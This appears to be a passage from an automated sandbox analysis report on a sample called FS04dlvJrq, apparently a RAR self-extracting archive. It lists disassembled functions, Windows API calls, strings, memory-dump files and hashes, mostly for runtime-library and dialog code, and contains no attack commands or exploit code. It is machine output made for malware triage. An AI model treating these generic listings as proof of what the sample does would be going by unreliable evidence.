                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d$qI
                                                                                              • API String ID: 2407758923-2243056709
                                                                                              • Opcode ID: e3f730f0a2c60fca8b84e6aff4075f39fd1de1687a89924b70e4d09f6993bb8b
                                                                                              • Instruction ID: 7fe347488d1039c85b62a81429c7e0782942af4ecbb4a0c9d02dcd51403c170c
                                                                                              • Opcode Fuzzy Hash: e3f730f0a2c60fca8b84e6aff4075f39fd1de1687a89924b70e4d09f6993bb8b
                                                                                              • Instruction Fuzzy Hash: 8A81A0B2509301AFD714DF68CD89A6FBBE9EBC9704F00591DF989A3291D730E909CB52
                                                                                              Function 00E861A7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00EB60E0,00000FA0,?,?,00E86185), ref: 00E861B3
                                                                                              • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00E86185), ref: 00E861BE
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00E86185), ref: 00E861CF
                                                                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E861E1
                                                                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E861EF
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E86185), ref: 00E86212
                                                                                              • DeleteCriticalSection.KERNEL32(00EB60E0,00000007,?,?,00E86185), ref: 00E86235
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00E86185), ref: 00E86245
                                                                                              Strings
                                                                                              • WakeAllConditionVariable, xrefs: 00E861E7
                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E861B9
                                                                                              • SleepConditionVariableCS, xrefs: 00E861DB
                                                                                              • kernel32.dll, xrefs: 00E861CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                              • API String ID: 2565136772-3242537097
                                                                                              • Opcode ID: 3b400570de86ebf31c7b94a9d3bd6e1f96b19123fb827625c4dd39ef2ab71b56
                                                                                              • Instruction ID: e8e46d8455882794540903ffd14fbfe54959ee44237d3dc442edcc65f5cb08b8
                                                                                              • Opcode Fuzzy Hash: 3b400570de86ebf31c7b94a9d3bd6e1f96b19123fb827625c4dd39ef2ab71b56
                                                                                              • Instruction Fuzzy Hash: 29019E70A40311EFCA307B77AC0DB572AA8EB44B45F105523F95DF2260EA64C8048B32
                                                                                              Function 00E937D2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 00E93816
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E933CE
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E933E0
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E933F2
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93404
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93416
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93428
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E9343A
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E9344C
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E9345E
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93470
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93482
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E93494
                                                                                                • Part of subcall function 00E933B1: _free.LIBCMT ref: 00E934A6
                                                                                              • _free.LIBCMT ref: 00E9380B
                                                                                                • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
                                                                                                • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
                                                                                              • _free.LIBCMT ref: 00E9382D
                                                                                              • _free.LIBCMT ref: 00E93842
                                                                                              • _free.LIBCMT ref: 00E9384D
                                                                                              • _free.LIBCMT ref: 00E9386F
                                                                                              • _free.LIBCMT ref: 00E93882
                                                                                              • _free.LIBCMT ref: 00E93890
                                                                                              • _free.LIBCMT ref: 00E9389B
                                                                                              • _free.LIBCMT ref: 00E938D3
                                                                                              • _free.LIBCMT ref: 00E938DA
                                                                                              • _free.LIBCMT ref: 00E938F7
                                                                                              • _free.LIBCMT ref: 00E9390F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 017098ab5fe003ed9471c8e0897a26e2939ee523f40963adb1f92b6e605c888a
                                                                                              • Instruction ID: 740d9478eb780f8308351dbac99bae607ae3da7d50231da268cd73176173bd79
                                                                                              • Opcode Fuzzy Hash: 017098ab5fe003ed9471c8e0897a26e2939ee523f40963adb1f92b6e605c888a
                                                                                              • Instruction Fuzzy Hash: 43316931604304AFEF34AA79EC45B6AB3E8EF40314F54642AF458F7591DEB1AE84CB20
                                                                                              Function 00E7D912 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 157memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E7D919
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              • _wcslen.LIBCMT ref: 00E7D97B
                                                                                              • _wcslen.LIBCMT ref: 00E7D99A
                                                                                              • _wcslen.LIBCMT ref: 00E7D9B6
                                                                                              • _strlen.LIBCMT ref: 00E7DA14
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,00E9D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00E7DA2D
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00E7DA54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                                                                              • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 1185167184-1533471033
                                                                                              • Opcode ID: dc2f8a5713fca2e4caa5353626bc2a5a6f64fc643f8989b7d0044503c9c00739
                                                                                              • Instruction ID: 40e9e1c2b3dc5443c3acd10de8902635395bd51461ebf6c0d2e8ab7943cb41e6
                                                                                              • Opcode Fuzzy Hash: dc2f8a5713fca2e4caa5353626bc2a5a6f64fc643f8989b7d0044503c9c00739
                                                                                              • Instruction Fuzzy Hash: 26518E71D04218AFEF05EBE0CC46BEEBBB8EF45310F14601AE509BB181DBA05E45CBA1
                                                                                              Function 00E83796 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 00E837C4
                                                                                              • GetClassNameW.USER32(00000000,?,00000080), ref: 00E837F0
                                                                                                • Part of subcall function 00E78DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00E70E3F,?,?,?,00000046,00E71ECE,00000046,?,exe,00000046), ref: 00E78DBA
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E8380C
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E83823
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E83837
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E83860
                                                                                              • DeleteObject.GDI32(00000000), ref: 00E83867
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00E83870
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: 1d06441947a5740bdb35b0af5b434047fbc94496205dab9651328ffc9ba46737
                                                                                              • Instruction ID: df714dd980214b72ab3dac5c6fb0a8b480cb6776d68ab1c333c95eed8300838d
                                                                                              • Opcode Fuzzy Hash: 1d06441947a5740bdb35b0af5b434047fbc94496205dab9651328ffc9ba46737
                                                                                              • Instruction Fuzzy Hash: 372122721493107FE225BB35DC4AFEF339CAF89B00F005225FA89B61D1DB30890987A5
                                                                                              Function 00E8FF11 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00E8FF25
                                                                                                • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
                                                                                                • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
                                                                                              • _free.LIBCMT ref: 00E8FF31
                                                                                              • _free.LIBCMT ref: 00E8FF3C
                                                                                              • _free.LIBCMT ref: 00E8FF47
                                                                                              • _free.LIBCMT ref: 00E8FF52
                                                                                              • _free.LIBCMT ref: 00E8FF5D
                                                                                              • _free.LIBCMT ref: 00E8FF68
                                                                                              • _free.LIBCMT ref: 00E8FF73
                                                                                              • _free.LIBCMT ref: 00E8FF7E
                                                                                              • _free.LIBCMT ref: 00E8FF8C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: f2db54f2dfa6bacf9124bd0bfc3a21c23abb3faf2b8feeaeeb3d5945d128d84e
                                                                                              • Instruction ID: 490165d034f755a46d25c7d7052d90be860d491bc130bea9aa15b49f28313b48
                                                                                              • Opcode Fuzzy Hash: f2db54f2dfa6bacf9124bd0bfc3a21c23abb3faf2b8feeaeeb3d5945d128d84e
                                                                                              • Instruction Fuzzy Hash: 2911727651424CBFCF01EF94CD42CDD3BA9EF08350B9161A5FA08AB262DA71EA50DB80
                                                                                              Function 00E89AB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: f0015979ede9efc66ca92f9000a0e4346a2fdd852df4cb2197367100452fa6ce
                                                                                              • Instruction ID: d607bb4e494a0aca327c3e211f901fb552e375b9a7d03334b0acc16d7ba25fec
                                                                                              • Opcode Fuzzy Hash: f0015979ede9efc66ca92f9000a0e4346a2fdd852df4cb2197367100452fa6ce
                                                                                              • Instruction Fuzzy Hash: 6AB16435C00209EFCF19EFA4D9819BEBBB5AF04318B18646AE80D7B253D731DA51CB95
                                                                                              Function 00E6D990 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6D99A
                                                                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00E6D9BF
                                                                                              • GetLongPathNameW.KERNEL32(?,?,?), ref: 00E6DA11
                                                                                              • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00E6DA34
                                                                                              • GetShortPathNameW.KERNEL32(?,?,?), ref: 00E6DA84
                                                                                              • MoveFileW.KERNEL32(-00000040,-00000028), ref: 00E6DC9F
                                                                                              • MoveFileW.KERNEL32(-00000028,-00000040), ref: 00E6DCEC
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                                                              • String ID: rtmp
                                                                                              • API String ID: 2388273531-870060881
                                                                                              • Opcode ID: 5e4f3f20359e797f9eb303a3c02cef3a412a35efc5ad8066996b115947127d46
                                                                                              • Instruction ID: 11a5a24c6025ce3437f9f8c4c15696bff918a63e333840bb8f114e90c72e70df
                                                                                              • Opcode Fuzzy Hash: 5e4f3f20359e797f9eb303a3c02cef3a412a35efc5ad8066996b115947127d46
                                                                                              • Instruction Fuzzy Hash: 65B15670E44258DACF21EFA4EC85BDDBBB8AF14384F845199E009B7251DB309B89CF60
                                                                                              Function 00E71E54 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 215COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3__wcslen
                                                                                              • String ID: .rar$exe$rar$sfx
                                                                                              • API String ID: 3251556500-630704357
                                                                                              • Opcode ID: 480075c7fa87eaeb902f8c5a8f5615fea100a02661cf13ff2735c45bde8176c8
                                                                                              • Instruction ID: 7c5abe2e38eed48f967302eff1b5e0d5123d96a332b64edcba775ca255f85d09
                                                                                              • Opcode Fuzzy Hash: 480075c7fa87eaeb902f8c5a8f5615fea100a02661cf13ff2735c45bde8176c8
                                                                                              • Instruction Fuzzy Hash: 0371E230B007109BCF25EFA8C941AADB7F4EF48B50F24A55EF589BB291DB719942C760
                                                                                              Function 00E806D0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                                • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E80720
                                                                                              • SendMessageW.USER32(?,00000080,00000001,0001042F), ref: 00E80747
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,0F050EA2), ref: 00E80760
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00E8077C
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E80790
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E807A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$DialogTextWindow
                                                                                              • String ID: LICENSEDLG$J
                                                                                              • API String ID: 3077722735-3331784582
                                                                                              • Opcode ID: 1cb009230b1a1f105fd0d4e8d866d9896a4808e8e6e45d98c7f968a805b12963
                                                                                              • Instruction ID: 14a32b14484c72df430e10a07e13eb19e5c2151712c61e0e7923049c4041b05c
                                                                                              • Opcode Fuzzy Hash: 1cb009230b1a1f105fd0d4e8d866d9896a4808e8e6e45d98c7f968a805b12963
                                                                                              • Instruction Fuzzy Hash: 12210531245204BFD2527F369D4CE6B3BACEB8A785F001116F649B65A1C663A9088B31
                                                                                              Function 00E7F1EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00E7F1F5
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00E7F224
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00E7F2BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease
                                                                                              • String ID: )K$DK$NK$lK$vK
                                                                                              • API String ID: 1429681911-958383546
                                                                                              • Opcode ID: 6a73787bc344b9a3bd2ba11e96b2289dce661a0cd28909331fbc39eebf895592
                                                                                              • Instruction ID: 48bbd65db53dcbece78da6cced67c9387c19ff2d465e2e6f2da3c77f93d9f801
                                                                                              • Opcode Fuzzy Hash: 6a73787bc344b9a3bd2ba11e96b2289dce661a0cd28909331fbc39eebf895592
                                                                                              • Instruction Fuzzy Hash: 6821ED7210C304EFD7016FA2DC48E6BBFE9FB89351F040619FA85A2621D63199599B62
                                                                                              Function 00E853D0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00E704AB,00E704AD,00000000,00000000,522FB702,00000001,00000000,00000000,?,00E7038C,?,00000004,00E704AB,ROOT\CIMV2), ref: 00E85459
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00E704AB,?,00000000,00000000,?,?,00E7038C,?,00000004,00E704AB), ref: 00E854D4
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00E854DF
                                                                                              • _com_issue_error.COMSUPP ref: 00E85508
                                                                                              • _com_issue_error.COMSUPP ref: 00E85512
                                                                                              • GetLastError.KERNEL32(80070057,522FB702,00000001,00000000,00000000,?,00E7038C,?,00000004,00E704AB,ROOT\CIMV2), ref: 00E85517
                                                                                              • _com_issue_error.COMSUPP ref: 00E8552A
                                                                                              • GetLastError.KERNEL32(00000000,?,00E7038C,?,00000004,00E704AB,ROOT\CIMV2), ref: 00E85540
                                                                                              • _com_issue_error.COMSUPP ref: 00E85553
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 1353541977-0
                                                                                              • Opcode ID: 94b988b33360e7b7a09dca0d06eb981884c66bc56b23431a6c3be1e895c36e3f
                                                                                              • Instruction ID: 200c5500e4143eb68550d5fe64d255a337808c6a1b543eae688135f14a7e76d4
                                                                                              • Opcode Fuzzy Hash: 94b988b33360e7b7a09dca0d06eb981884c66bc56b23431a6c3be1e895c36e3f
                                                                                              • Instruction Fuzzy Hash: A041F872A00704EFCB10BFA9DC45BAEB7E9EB48714F10522AF51DF7291DB7498408BA5
                                                                                              Function 00E70469 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E70470
                                                                                                • Part of subcall function 00E70360: __EH_prolog3.LIBCMT ref: 00E70367
                                                                                              • VariantClear.OLEAUT32(?), ref: 00E705FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
